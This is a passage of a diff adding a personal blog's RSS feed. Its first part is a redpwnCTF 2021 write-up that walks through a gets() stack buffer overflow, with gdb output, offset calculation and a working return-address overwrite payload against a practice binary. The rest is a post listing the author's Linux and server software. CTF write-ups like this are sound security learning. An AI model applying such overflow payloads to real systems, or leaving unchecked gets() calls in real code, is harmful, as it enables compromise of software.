+    &lt;span class="token keyword"&gt;
+     char
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+     comments_and_concerns
+    &lt;/span&gt;
+    &lt;span class="token punctuation"&gt;
+     [
+    &lt;/span&gt;
+    &lt;span class="token number"&gt;
+     32
+    &lt;/span&gt;
+    &lt;span class="token punctuation"&gt;
+     ]
+    &lt;/span&gt;
+    &lt;span class="token punctuation"&gt;
+     ;
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+    &lt;/span&gt;
+    &lt;span class="token function"&gt;
+     setbuf
+    &lt;/span&gt;
+    &lt;span class="token punctuation"&gt;
+     (
+    &lt;/span&gt;
+    &lt;span class="token constant"&gt;
+     stdout
+    &lt;/span&gt;
+    &lt;span class="token punctuation"&gt;
+     ,
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+    &lt;/span&gt;
+    &lt;span class="token constant"&gt;
+     NULL
+    &lt;/span&gt;
+    &lt;span class="token punctuation"&gt;
+     )
+    &lt;/span&gt;
+    &lt;span class="token punctuation"&gt;
+     ;
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+    &lt;/span&gt;
+    &lt;span class="token function"&gt;
+     setbuf
+    &lt;/span&gt;
+    &lt;span class="token punctuation"&gt;
+     (
+    &lt;/span&gt;
+    &lt;span class="token constant"&gt;
+     stdin
+    &lt;/span&gt;
+    &lt;span class="token punctuation"&gt;
+     ,
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+    &lt;/span&gt;
+    &lt;span class="token constant"&gt;
+     NULL
+    &lt;/span&gt;
+    &lt;span class="token punctuation"&gt;
+     )
+    &lt;/span&gt;
+    &lt;span class="token punctuation"&gt;
+     ;
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+    &lt;/span&gt;
+    &lt;span class="token function"&gt;
+     setbuf
+    &lt;/span&gt;
+    &lt;span class="token punctuation"&gt;
+     (
+    &lt;/span&gt;
+    &lt;span class="token constant"&gt;
+     stderr
+    &lt;/span&gt;
+    &lt;span class="token punctuation"&gt;
+     ,
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+    &lt;/span&gt;
+    &lt;span class="token constant"&gt;
+     NULL
+    &lt;/span&gt;
+    &lt;span class="token punctuation"&gt;
+     )
+    &lt;/span&gt;
+    &lt;span class="token punctuation"&gt;
+     ;
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+    &lt;/span&gt;
+    &lt;span class="token function"&gt;
+     puts
+    &lt;/span&gt;
+    &lt;span class="token punctuation"&gt;
+     (
+    &lt;/span&gt;
+    &lt;span class="token string"&gt;
+     "alright, the rob inc company meeting is tomorrow and i have to come up with a new pwnable..."
+    &lt;/span&gt;
+    &lt;span class="token punctuation"&gt;
+     )
+    &lt;/span&gt;
+    &lt;span class="token punctuation"&gt;
+     ;
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+    &lt;/span&gt;
+    &lt;span class="token function"&gt;
+     puts
+    &lt;/span&gt;
+    &lt;span class="token punctuation"&gt;
+     (
+    &lt;/span&gt;
+    &lt;span class="token string"&gt;
+     "how about this, we'll make a generic pwnable with an overflow and they've got to ret to some flag reading function!"
+    &lt;/span&gt;
+    &lt;span class="token punctuation"&gt;
+     )
+    &lt;/span&gt;
+    &lt;span class="token punctuation"&gt;
+     ;
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+    &lt;/span&gt;
+    &lt;span class="token function"&gt;
+     puts
+    &lt;/span&gt;
+    &lt;span class="token punctuation"&gt;
+     (
+    &lt;/span&gt;
+    &lt;span class="token string"&gt;
+     "slap on some flavortext and there's no way rob will fire me now!"
+    &lt;/span&gt;
+    &lt;span class="token punctuation"&gt;
+     )
+    &lt;/span&gt;
+    &lt;span class="token punctuation"&gt;
+     ;
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+    &lt;/span&gt;
+    &lt;span class="token function"&gt;
+     puts
+    &lt;/span&gt;
+    &lt;span class="token punctuation"&gt;
+     (
+    &lt;/span&gt;
+    &lt;span class="token string"&gt;
+     "this is genius!! what do you think?"
+    &lt;/span&gt;
+    &lt;span class="token punctuation"&gt;
+     )
+    &lt;/span&gt;
+    &lt;span class="token punctuation"&gt;
+     ;
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+    &lt;/span&gt;
+    &lt;span class="token function"&gt;
+     gets
+    &lt;/span&gt;
+    &lt;span class="token punctuation"&gt;
+     (
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+     comments_and_concerns
+    &lt;/span&gt;
+    &lt;span class="token punctuation"&gt;
+     )
+    &lt;/span&gt;
+    &lt;span class="token punctuation"&gt;
+     ;
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+    &lt;/span&gt;
+    &lt;span class="token punctuation"&gt;
+     }
+    &lt;/span&gt;
+   &lt;/code&gt;
+  &lt;/div&gt;
+ &lt;/pre&gt;
+ &lt;p&gt;
+  With my newfound knowledge of binary exploitation, I figured I would have to
+overwrite the return pointer on the stack somehow, so the program calls the
+  &lt;code&gt;
+   super_generic_flag_reading_function_please_ret_to_me
+  &lt;/code&gt;
+  function that isn't
+called at all in the original.
+ &lt;/p&gt;
+ &lt;p&gt;
+  The only input we have control over is again a call to
+  &lt;code&gt;
+   gets();
+  &lt;/code&gt;
+ &lt;/p&gt;
+ &lt;p&gt;
+  Let's look at the dissassembly in gdb:
+ &lt;/p&gt;
+ &lt;pre&gt;
+  &lt;code&gt;
+   (gdb) disas main
+Dump of assembler code for function main:
+   0x00000000004013f4 &lt;+79&gt;:    call   0x4010a0 &lt;puts@plt&gt;
+   0x00000000004013f9 &lt;+84&gt;:    lea    rdi,[rip+0xca0]        # 0x4020a0
+   0x0000000000401400 &lt;+91&gt;:    call   0x4010a0 &lt;puts@plt&gt;
+   0x0000000000401405 &lt;+96&gt;:    lea    rdi,[rip+0xd0c]        # 0x402118
+   0x000000000040140c &lt;+103&gt;:   call   0x4010a0 &lt;puts@plt&gt;
+   0x0000000000401411 &lt;+108&gt;:   lea    rdi,[rip+0xd48]        # 0x402160
+   0x0000000000401418 &lt;+115&gt;:   call   0x4010a0 &lt;puts@plt&gt;
+   0x000000000040141d &lt;+120&gt;:   lea    rax,[rbp-0x20]
+   0x0000000000401421 &lt;+124&gt;:   mov    rdi,rax
+   0x0000000000401424 &lt;+127&gt;:   call   0x4010e0 &lt;gets@plt&gt;
+   0x0000000000401429 &lt;+132&gt;:   mov    eax,0x0
+   0x000000000040142e &lt;+137&gt;:   leave
+   0x000000000040142f &lt;+138&gt;:   ret
+End of assembler dump.
+  &lt;/code&gt;
+ &lt;/pre&gt;
+ &lt;p&gt;
+  We see again multiple calls to
+  &lt;code&gt;
+   &lt;puts@plt&gt;
+  &lt;/code&gt;
+  and right after a call to
+  &lt;code&gt;
+   &lt;gets@plt&gt;
+  &lt;/code&gt;
+  . There is no
+  &lt;code&gt;
+   cmp
+  &lt;/code&gt;
+  and
+  &lt;code&gt;
+   jne
+  &lt;/code&gt;
+  to be found in this challenge though.
+ &lt;/p&gt;
+ &lt;p&gt;
+  The goal is to overwrite the
+  &lt;em&gt;
+   return adress
+  &lt;/em&gt;
+  . This is a memory adress also
+stored in memory, and the program will move execution to that memory adress
+once it sees a
+  &lt;code&gt;
+   ret
+  &lt;/code&gt;
+  instruction. In this 'vanilla' state, the return adress
+always goes to the assembly equivalent of an
+  &lt;code&gt;
+   exit()
+  &lt;/code&gt;
+  function. Let's see if we
+can overwrite it by giving too much input:
+ &lt;/p&gt;
+ &lt;pre&gt;
+  &lt;code&gt;
+   (gdb) break *0x000000000040142f
+Breakpoint 1 at 0x40142f
+(gdb) run &lt; &lt;(python3 -c "print('a' * 56)")
+-- Breakpoint 1 hit --
+(gdb) info registers
+rax            0x0                 0x0
+rbx            0x401430            0x401430
+rsi            0x7ffff7f7d883      0x7ffff7f7d883
+rdi            0x7ffff7f804e0      0x7ffff7f804e0
+rbp            0x6161616161616161  0x6161616161616161
+rsp            0x7fffffffd898      0x7fffffffd898
+rip            0x40142f            0x40142f &lt;main+138&gt;
+  &lt;/code&gt;
+ &lt;/pre&gt;
+ &lt;p&gt;
+  As you can see, the $rbp register is completely overwritten with
+  &lt;code&gt;
+   0x61
+  &lt;/code&gt;
+  's.
+Let's check the $rsp register to see where the
+  &lt;code&gt;
+   main()
+  &lt;/code&gt;
+  function tries to go
+after
+  &lt;code&gt;
+   ret
+  &lt;/code&gt;
+  :
+ &lt;/p&gt;
+ &lt;pre&gt;
+  &lt;code&gt;
+   (gdb) run
+Starting program: ret2generic-flag-reader
+alright, the rob inc company meeting is tomorrow and i have to come up with a new pwnable...
+how about this, we'll make a generic pwnable with an overflow and they've got to ret to some flag reading function!
+slap on some flavortext and there's no way rob will fire me now!
+this is genius!! what do you think?
+a0a1a2a3a4a5a6a7a8a9b0b1b2b3b4b5b6b7b8b9c0c1c2c3
+-- Breakpoint 1 hit --
+(gdb) x/1gx $rsp
+0x7fffffffd898: 0x3363326331633063
+  &lt;/code&gt;
+ &lt;/pre&gt;
+ &lt;p&gt;
+  Let's use cyberchef to see what
+  &lt;code&gt;
+   0x3363326331633063
+  &lt;/code&gt;
+  is in ascii!
+ &lt;/p&gt;
+ &lt;p&gt;
+ &lt;/p&gt;
+ &lt;div class="image"&gt;
+  &lt;img src="/img/redpwn2021/cyberchef1.png" alt=""&gt;
+ &lt;/div&gt;
+ &lt;p&gt;
+ &lt;/p&gt;
+ &lt;p&gt;
+  Hmm, it's backwards. Let's reverse it!
+ &lt;/p&gt;
+ &lt;p&gt;
+ &lt;/p&gt;
+ &lt;div class="image"&gt;
+  &lt;img src="/img/redpwn2021/cyberchef2.png" alt=""&gt;
+ &lt;/div&gt;
+ &lt;p&gt;
+ &lt;/p&gt;
+ &lt;p&gt;
+  Let's find the adress of the super generic flag reading function with gdb.
+ &lt;/p&gt;
+ &lt;pre&gt;
+  &lt;code&gt;
+   (gdb) print super_generic_flag_reading_function_please_ret_to_me
+$2 = {&lt;text variable, no debug info&gt;} 0x4011f6 &lt;super_generic_flag_reading_function_please_ret_to_me&gt;
+  &lt;/code&gt;
+ &lt;/pre&gt;
+ &lt;p&gt;
+  Now we're ready to craft a string that exploits the program and runs the secret
+function!
+ &lt;/p&gt;
+ &lt;pre&gt;
+  &lt;code&gt;
+   a0a1a2a3a4a5a6a7a8a9b0b1b2b3b4b5b6b7b8b9c0c1c2c3 &lt;- original
+                                        c0c1c2c3 &lt;- ends up in $rsp
+aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa         &lt;- padding ( 0x28 * 'a' )
+
+  c 0 c 1 c 2 c 3  &lt;- ends up in $rsp
+  3 c 2 c 1 c 0 c  &lt;- reverse
+0x3363326331633063 &lt;- reverse (hex)
+0x00000000004011f6 &lt;- pointer we want in $rsp
+  f611400000000000 &lt;- reverse
+  \xf6\x11\x40\x00\x00\x00\x00\x00 &lt;- python bytestring
+
+exploit string:
+b'a' * 0x28 + b'\xf6\x11\x40\x00\x00\x00\x00\x00'
+  &lt;/code&gt;
+ &lt;/pre&gt;
+ &lt;p&gt;
+  Now let's try it in an environment-less shell:
+ &lt;/p&gt;
+ &lt;pre&gt;
+  &lt;code&gt;
+   python3 -c "import sys; sys.stdout.buffer.write(b'a' * 0x28 + b'\xf6\x11\x40\x00\x00\x00\x00\x00')" | ./ret2generic-flag-reader
+alright, the rob inc company meeting is tomorrow and i have to come up with a new pwnable...
+how about this, we'll make a generic pwnable with an overflow and they've got to ret to some flag reading function!
+slap on some flavortext and there's no way rob will fire me now!
+this is genius!! what do you think?
+flag{this_is_a_dummy_flag_go_solve_it_yourself}
+
+Segmentation fault (core dumped)
+sh-5.1$
+  &lt;/code&gt;
+ &lt;/pre&gt;
+ &lt;h3 id="revbread-making"&gt;
+  rev/bread-making
+ &lt;/h3&gt;
+ &lt;p&gt;
+  For this challenge, I first tried using iaito again to do some program flow
+analysis. After giving up on that, I decided to instead brute-force the correct
+steps by hand. This was a very long and boring process.
+ &lt;/p&gt;
+ &lt;p&gt;
+  First I used
+  &lt;code&gt;
+   strings
+  &lt;/code&gt;
+  again to extract all the dialogue and user input strings
+from the binary. Then I filtered them to not include obvious dialogue, but only
+the possible user input strings. And this is the correct path that gives the
+flag:
+ &lt;/p&gt;
+ &lt;pre&gt;
+  &lt;code&gt;
+   add flour
+add salt
+add yeast
+add water
+hide the bowl inside a box
+wait 3 hours
+work in the basement
+preheat the toaster oven
+set a timer on your phone
+watch the bread bake
+pull the tray out with a towel
+open the window
+unplug the oven
+unplug the fire alarm
+wash the sink
+clean the counters
+flush the bread down the toilet
+get ready to sleep
+close the window
+replace the fire alarm
+brush teeth and go to bed
+  &lt;/code&gt;
+ &lt;/pre&gt;
+ &lt;p&gt;
+  In hindsight I could've probably made a simple python script to brute force all
+remaining possibilities until it got longer output from the program, but
+laziness took over and I decided that spending 45 minutes doing very dull work
+was more worth it instead.
+ &lt;/p&gt;
+ &lt;h2 id="epilogue"&gt;
+  Epilogue
+ &lt;/h2&gt;
+ &lt;p&gt;
+  Of the 47 total challenges, me and Willem only solved 15. My end goal for this
+CTF wasn't winning to begin with, so the outcome didn't matter for me. After
+the second day I set the goal of reaching the 3rd page of the leaderboards as
+my goal, and we reached 277'th place in the end which made my mom very proud!
+ &lt;/p&gt;
+ &lt;p&gt;
+ &lt;/p&gt;
+ &lt;div class="image"&gt;
+  &lt;img src="/img/redpwn2021/leaderboard.png" alt=""&gt;
+ &lt;/div&gt;
+ &lt;p&gt;
+ &lt;/p&gt;
+ &lt;p&gt;
+  I enjoyed the CTF a lot! There were some very frustrating challenges, and I
+still don't get how people solved web/wtjs, but that's fine. I did learn how to
+use GDB and a lot of other things during the CTF which were all very rewarding.
+I will definitely be participating in the 2022 redpwnCTF, and maybe even some
+others if they're beginner friendly :)
+ &lt;/p&gt;
+ &lt;p&gt;
+  During the Radboud CTF and this CTF I've accumulated a lot of ideas to maybe
+host one myself, though I have no clue where to start with that. Maybe keep an
+eye out for that ;)
+ &lt;/p&gt;
+&lt;/div&gt;</description>
+    </item>
+    <item>
+      <title>Software that I use</title>
+      <guid>software</guid>
+      <link>/post/software</link>
+      <pubDate>April 13 2021</pubDate>
+      <description>&lt;div class="contentWrapper"&gt;
+ &lt;h2 id="pc-software"&gt;
+  PC software
+ &lt;/h2&gt;
+ &lt;p&gt;
+  All of the software on this page is cool and I think you should try it. I also
+use all of this software, and will update this page when I find new,
+  &lt;em&gt;
+   even
+cooler
+  &lt;/em&gt;
+  software to use instead. Most if not all of my configuration files
+(dotfiles) are on my
+  &lt;a href="https://github.com/lonkaars/dotfiles"&gt;
+   github
+  &lt;/a&gt;
+  . You can
+clone these and edit them to fit your needs, or you can use them as a reference
+for when you can't figure out how to configure something.
+ &lt;/p&gt;
+ &lt;h3 id="regular-software"&gt;
+  Regular software
+ &lt;/h3&gt;
+ &lt;ul&gt;
+  &lt;li&gt;
+   &lt;p&gt;
+    &lt;strong&gt;
+     Email client
+    &lt;/strong&gt;
+    :
+    &lt;a href="https://neomutt.org/"&gt;
+     neomutt
+    &lt;/a&gt;
+    . It's fast and simple,
+though configuring it was a pain in the ass. I'm currently using it in
+combination with mbsync and imapnotify to get notifications for new emails,
+and sync my mailbox for fast email viewing.
+   &lt;/p&gt;
+  &lt;/li&gt;
+  &lt;li&gt;
+   &lt;p&gt;
+    &lt;strong&gt;
+     Music player
+    &lt;/strong&gt;
+    :
+    &lt;a href="https://www.musicpd.org/"&gt;
+     mpd
+    &lt;/a&gt;
+    with
+    &lt;a href="https://github.com/ncmpcpp/ncmpcpp"&gt;
+     ncmpcpp
+    &lt;/a&gt;
+    . This is the best music setup
+I've ever used. I download all my music in .flac format and mpd
+    &lt;em&gt;
+     just works
+    &lt;/em&gt;
+    .
+Since mpd has a server-client structure, I could also use this to set up
+multiple devices that can add music to a central queue at a party or
+something, but I just use it to launch
+    &lt;a href="https://github.com/DanielFGray/fzf-scripts/blob/master/fzmp"&gt;
+     an fzf mpc
+wrapper
+    &lt;/a&gt;
+    to
+quickly add music while I'm doing something else.
+   &lt;/p&gt;
+  &lt;/li&gt;
+  &lt;li&gt;
+   &lt;p&gt;
+    &lt;strong&gt;
+     Text editor
+    &lt;/strong&gt;
+    :
+    &lt;a href="https://neovim.io/"&gt;
+     nvim
+    &lt;/a&gt;
+    . It's vim. If you don't like vim,
+you should try using it longer. If you still don't like vim, you can use
+    &lt;a href="https://appimage.github.io/Code_OSS/"&gt;
+     code oss
+    &lt;/a&gt;
+    which is visual studio code
+but without Microsoft's creepy telemetry features.
+   &lt;/p&gt;
+  &lt;/li&gt;
+  &lt;li&gt;
+   &lt;p&gt;
+    &lt;strong&gt;
+     PDF viewer
+    &lt;/strong&gt;
+    :
+    &lt;a href="https://pwmt.org/projects/zathura/"&gt;
+     zathura
+    &lt;/a&gt;
+    . It's a pdf
+viewer with vim bindings, and it works with my TeX editing setup's live
+reload thingy.
+   &lt;/p&gt;
+  &lt;/li&gt;
+  &lt;li&gt;
+   &lt;p&gt;
+    &lt;strong&gt;
+     Image viewer
+    &lt;/strong&gt;
+    :
+    &lt;a href="https://github.com/muennich/sxiv"&gt;
+     sxiv
+    &lt;/a&gt;
+    . It's like zathura
+but for images, but it also does a bunch of other stuff that I don't use very
+often.
+   &lt;/p&gt;
+  &lt;/li&gt;
+  &lt;li&gt;
+   &lt;p&gt;
+    &lt;strong&gt;
+     Browser
+    &lt;/strong&gt;
+    :
+    &lt;a href="https://brave.com/"&gt;
+     brave
+    &lt;/a&gt;
+    . It's a normie-friendly chromium
+fork with extra privacy features! I of course use brave (or any
+chromium-based browser) with
+    &lt;a href="https://www.tampermonkey.net/"&gt;
+     tampermonkey
+    &lt;/a&gt;
+    ,
+    &lt;a href="https://ublockorigin.com/"&gt;
+     ublock origin
+    &lt;/a&gt;
+    ,
+    &lt;a href="https://github.com/openstyles/stylus"&gt;
+     stylus
+    &lt;/a&gt;
+    and
+    &lt;a href="https://darkreader.org/"&gt;
+     dark
+reader
+    &lt;/a&gt;
+    .
+   &lt;/p&gt;
+  &lt;/li&gt;
+  &lt;li&gt;
+   &lt;p&gt;
+    &lt;strong&gt;
+     Terminal
+    &lt;/strong&gt;
+    :
+    &lt;a href="https://st.suckless.org/"&gt;
+     st
+    &lt;/a&gt;
+    . It's fast and simple, nothing
+to complain about. I have my
+    &lt;a href="https://github.com/lonkaars/st"&gt;
+     own st fork
+    &lt;/a&gt;
+    ,
+with a bunch of patches that make me happy.
+   &lt;/p&gt;
+  &lt;/li&gt;
+  &lt;li&gt;
+   &lt;p&gt;
+    &lt;strong&gt;
+     Password manager
+    &lt;/strong&gt;
+    :
+    &lt;a href="https://bitwarden.com/"&gt;
+     bitwarden
+    &lt;/a&gt;
+    . Open source
+password manager that you can host yourself. It also has public servers which
+are mostly free, but some features like time-based one-time passwords are
+paid. All the clients are also open source.
+   &lt;/p&gt;
+  &lt;/li&gt;
+  &lt;li&gt;
+   &lt;p&gt;
+    &lt;strong&gt;
+     Document typesetting
+    &lt;/strong&gt;
+    :
+    &lt;a href="https://www.latex-project.org/"&gt;
+     LaTeX
+    &lt;/a&gt;
+    (using
+    &lt;a href="https://personal.psu.edu/~jcc8/software/latexmk/"&gt;
+     latexmk
+    &lt;/a&gt;
+    with the
+    &lt;a href="http://xetex.sourceforge.net/"&gt;
+     XeTeX
+    &lt;/a&gt;
+    compiler).
+   &lt;/p&gt;
+  &lt;/li&gt;
+  &lt;li&gt;
+   &lt;p&gt;
+    &lt;strong&gt;
+     File browser
+    &lt;/strong&gt;
+    :
+    &lt;a href="https://github.com/ranger/ranger"&gt;
+     ranger
+    &lt;/a&gt;
+    . It's kind of
+slow, but I use the bulkrename feature very often, and I haven't gotten used
+to the perl
+    &lt;code&gt;
+     rename
+    &lt;/code&gt;
+    script yet.
+   &lt;/p&gt;
+  &lt;/li&gt;
+  &lt;li&gt;
+   &lt;p&gt;
+    &lt;a href="https://github.com/MacPaw/XADMaster"&gt;
+     unar
+    &lt;/a&gt;
+    . I like running
+    &lt;code&gt;
+     unar [archive]
+    &lt;/code&gt;
+    instead of using
+    &lt;code&gt;
+     7z
+    &lt;/code&gt;
+    ,
+    &lt;code&gt;
+     tar
+    &lt;/code&gt;
+    ,
+    &lt;code&gt;
+     unzip
+    &lt;/code&gt;
+    , etc. It creates a new folder to unpack
+to automatically so it does exactly what I need.
+   &lt;/p&gt;
+  &lt;/li&gt;
+ &lt;/ul&gt;
+ &lt;h3 id="os-stuff"&gt;
+  OS stuff
+ &lt;/h3&gt;
+ &lt;ul&gt;
+  &lt;li&gt;
+   &lt;p&gt;
+    &lt;strong&gt;
+     Window manager
+    &lt;/strong&gt;
+    :
+    &lt;a href="https://github.com/Airblader/i3"&gt;
+     i3-gaps
+    &lt;/a&gt;
+    . I tried it
+once and didn't switch back so this is a winner I guess. I've also heard good
+things about
+    &lt;a href="https://dwm.suckless.org/"&gt;
+     dwm
+    &lt;/a&gt;
+    , though I haven't used it
+myself. Most people complain about i3's limited configurability, but I
+haven't ran into something that it doesn't do for me.
+   &lt;/p&gt;
+  &lt;/li&gt;
+  &lt;li&gt;
+   &lt;p&gt;
+    &lt;strong&gt;
+     Application launcher
+    &lt;/strong&gt;
+    :
+    &lt;a href="https://github.com/davatorium/rofi"&gt;
+     rofi
+    &lt;/a&gt;
+    . I've
+been using rofi since I started using linux, and haven't switched to anything
+else because it's
+    &lt;em&gt;
+     very
+    &lt;/em&gt;
+    configurable, and has a dmenu mode for using it
+instead of dmenu with other scripts. I use it primarily as my application
+launcher, but I also have a hotkey setup to launch
+    &lt;code&gt;
+     bwmenu
+    &lt;/code&gt;
+    which is a script
+that fills in bitwarden passwords using rofi.
+   &lt;/p&gt;
+  &lt;/li&gt;
+  &lt;li&gt;
+   &lt;p&gt;
+    &lt;strong&gt;
+     Shell
+    &lt;/strong&gt;
+    :
+    &lt;a href="https://www.zsh.org/"&gt;
+     zsh
+    &lt;/a&gt;
+    with
+    &lt;a href="https://ohmyz.sh/"&gt;
+     oh-my-zsh
+    &lt;/a&gt;
+    .
+It's zsh, all the cool kids use it already. I do have
+    &lt;code&gt;
+     /usr/bin/sh
+    &lt;/code&gt;
+    &lt;code&gt;
+     ln -s
+    &lt;/code&gt;
+    'd
+to
+    &lt;code&gt;
+     /usr/bin/bash
+    &lt;/code&gt;
+    , but I'd like to change that to
+    &lt;code&gt;
+     /usr/bin/dash
+    &lt;/code&gt;
+    . Eh, I'll
+get around to it someday.
+   &lt;/p&gt;
+  &lt;/li&gt;
+  &lt;li&gt;
+   &lt;p&gt;
+    &lt;strong&gt;
+     Status Bar
+    &lt;/strong&gt;
+    :
+    &lt;a href="https://github.com/polybar/polybar"&gt;
+     polybar
+    &lt;/a&gt;
+    . Simple bar,
+gets the job done, the configuration files make me go insane though. It took
+me a good half year of ricing to understand the polybar configuration files,
+and I'm still not sure if I do.
+   &lt;/p&gt;
+  &lt;/li&gt;
+  &lt;li&gt;
+   &lt;p&gt;
+    &lt;strong&gt;
+     Notification daemon
+    &lt;/strong&gt;
+    :
+    &lt;a href="https://dunst-project.org/"&gt;
+     dunst
+    &lt;/a&gt;
+    . I used to use
+deadd-notification-center, but that has waaaay too many haskell dependencies
+on arch, so I don't use that anymore.
+   &lt;/p&gt;
+  &lt;/li&gt;
+  &lt;li&gt;
+   &lt;p&gt;
+    &lt;strong&gt;
+     Global keybinds
+    &lt;/strong&gt;
+    :
+    &lt;a href="https://www.nongnu.org/xbindkeys/xbindkeys.html"&gt;
+     xbindkeys
+    &lt;/a&gt;
+    . Simple
+configuration, works flawlessly, 10/10.
+   &lt;/p&gt;
+  &lt;/li&gt;
+  &lt;li&gt;
+   &lt;p&gt;
+    &lt;strong&gt;
+     Compositor
+    &lt;/strong&gt;
+    :
+    &lt;a href="https://github.com/yshui/picom"&gt;
+     picom
+    &lt;/a&gt;
+    . It's a simple
+compositor. I use it to enable vsync for desktop windows, and I have it set
+up to only show a drop shadow on floating i3 windows.
+   &lt;/p&gt;
+  &lt;/li&gt;
+ &lt;/ul&gt;
+ &lt;h3 id="closed-source"&gt;
+  Closed source
+ &lt;/h3&gt;
+ &lt;ul&gt;
+  &lt;li&gt;
+   &lt;p&gt;
+    &lt;a href="https://discord.com/"&gt;
+     discord
+    &lt;/a&gt;
+    . Gamer. The only reason this is listed here
+is because I use discord with
+    &lt;a href="https://github.com/rauenzi/BetterDiscordApp"&gt;
+     betterdiscord
+    &lt;/a&gt;
+    (which
+    &lt;em&gt;
+     is
+    &lt;/em&gt;
+    open-source). Betterdiscord allows you to use custom css themes, custom
+plugins and a whole bunch of other cool stuff that regular discord doesn't
+do. It's technically against TOS, but I don't really care as I only use
+quality of life improvement plugins.
+   &lt;/p&gt;
+  &lt;/li&gt;
+  &lt;li&gt;
+   &lt;p&gt;
+    &lt;a href="https://figma.com"&gt;
+     figma
+    &lt;/a&gt;
+    . It's the designing software that I use to create
+user interface or website mockups. It's easily accessible though a browser,
+and it uses webassembly so it's also decently fast. It's free for personal
+use.
+   &lt;/p&gt;
+  &lt;/li&gt;
+ &lt;/ul&gt;
+ &lt;h2 id="server-software"&gt;
+  Server software
+ &lt;/h2&gt;
+ &lt;p&gt;
+  This is the software that runs on my home server.
+ &lt;/p&gt;
+ &lt;h3 id="email"&gt;
+  Email
+ &lt;/h3&gt;
+ &lt;p&gt;
+  I used
+  &lt;a href="http://lukesmith.xyz/"&gt;
+   Luke Smith's
+  &lt;/a&gt;
+  &lt;a href="https://github.com/LukeSmithxyz/emailwiz"&gt;
+   emailwiz
+  &lt;/a&gt;
+  to set up my email server.
+The script installs and configures an email setup with
+  &lt;a href="http://www.postfix.org/"&gt;
+   postfix
+  &lt;/a&gt;
+  ,
+  &lt;a href="https://www.dovecot.org/"&gt;
+   dovecot
+  &lt;/a&gt;
+  ,
+  &lt;a href="https://spamassassin.apache.org/"&gt;
+   spamassassin
+  &lt;/a&gt;
+  and
+  &lt;a href="http://www.opendkim.org/"&gt;
+   opendkim
+  &lt;/a&gt;
+  .
+ &lt;/p&gt;
+ &lt;h3 id="etesync"&gt;
+  Etesync
+ &lt;/h3&gt;
+ &lt;p&gt;
+  I run my own
+  &lt;a href="https://www.etesync.com/"&gt;
+   etesync
+  &lt;/a&gt;
+  server for synchronizing my
+to-do lists, calendar and contacts. It's relatively easy to set up, and has a
+web interface that you can use with your own self-hosted instance.
+ &lt;/p&gt;
+ &lt;h3 id="bitwarden"&gt;
+  Bitwarden
+ &lt;/h3&gt;
+ &lt;p&gt;
+  I also run my own
+  &lt;a href="https://github.com/bitwarden/server"&gt;
+   bitwarden
+  &lt;/a&gt;
+  server. It
+uses docker with docker-compose, which are two things that I'm supposed to know
+about, but I don't.
+ &lt;/p&gt;
+ &lt;p&gt;
+  I'm working on a connect 4 website myself, and I'm planning on learning to use
+docker with docker-compose to make it easier to run the seperate parts that are
+needed to host the project.
+ &lt;/p&gt;
+ &lt;h3 id="git"&gt;
+  Git
+ &lt;/h3&gt;
+ &lt;p&gt;
+  I have a
+  &lt;a href="https://git.zx2c4.com/cgit/about/"&gt;
+   cgit
+  &lt;/a&gt;
+  server to host my git
+repositories on
+  &lt;a href="https://git.pipeframe.xyz"&gt;
+   https://git.pipeframe.xyz
+  &lt;/a&gt;
+  , and I use
+  &lt;a href="https://gitolite.com/gitolite/"&gt;
+   gitolite
+  &lt;/a&gt;
+  for ssh git push access. Cgit is
+very easy to set up, and I like it very much. Gitolite on the other hand is a
+pain in the ass to set up, because the documentation is not that great. If
+you're planning on using gitolite on your own server, set the umask in
+  &lt;code&gt;
+   ~/.gitolite.rc
+  &lt;/code&gt;
+  of your server's git account to
+  &lt;code&gt;
+   0022
+  &lt;/code&gt;
+  .
+ &lt;/p&gt;
+ &lt;h3 id="sftp"&gt;
+  SFTP
+ &lt;/h3&gt;
+ &lt;p&gt;
+  I have two semi-public sftp accounts set up on my server:
+  &lt;code&gt;
+   media
+  &lt;/code&gt;
+  and
+  &lt;code&gt;
+   sftp
+  &lt;/code&gt;
+  .
+  &lt;code&gt;
+   sftp
+  &lt;/code&gt;
+  is for generic file sharing, and
+  &lt;code&gt;
+   media
+  &lt;/code&gt;
+  is for my media. Both accounts
+have tty login disabled and are chroot-jailed to /var/media and /var/sftp.
+ &lt;/p&gt;
+ &lt;h2 id="phone-apps"&gt;
+  Phone apps
+ &lt;/h2&gt;
+ &lt;p&gt;
+  These are the apps that I use on my phone. I have a Nokia 6 (2017), it's pretty
+shitty but I don't really use my phone. I used to have it rooted, but the root
+guide on xda forums was written by some Chinese guy, and it came with a Chinese
+android rom, which caused me to miss a lot of calls.
+ &lt;/p&gt;
+ &lt;h3 id="open-source"&gt;
+  Open source
+ &lt;/h3&gt;
+ &lt;ul&gt;
+  &lt;li&gt;
+   &lt;p&gt;
+    &lt;strong&gt;
+     One-time password generator
+    &lt;/strong&gt;
+    :
+    &lt;a href="https://github.com/andOTP/andOTP"&gt;
+     andotp
+    &lt;/a&gt;
+   &lt;/p&gt;
+  &lt;/li&gt;
+  &lt;li&gt;
+   &lt;p&gt;
+    &lt;strong&gt;
+     App store
+    &lt;/strong&gt;
+    :
+    &lt;a href="https://gitlab.com/AuroraOSS/AuroraStore"&gt;
+     aurora store
+    &lt;/a&gt;
+    . This
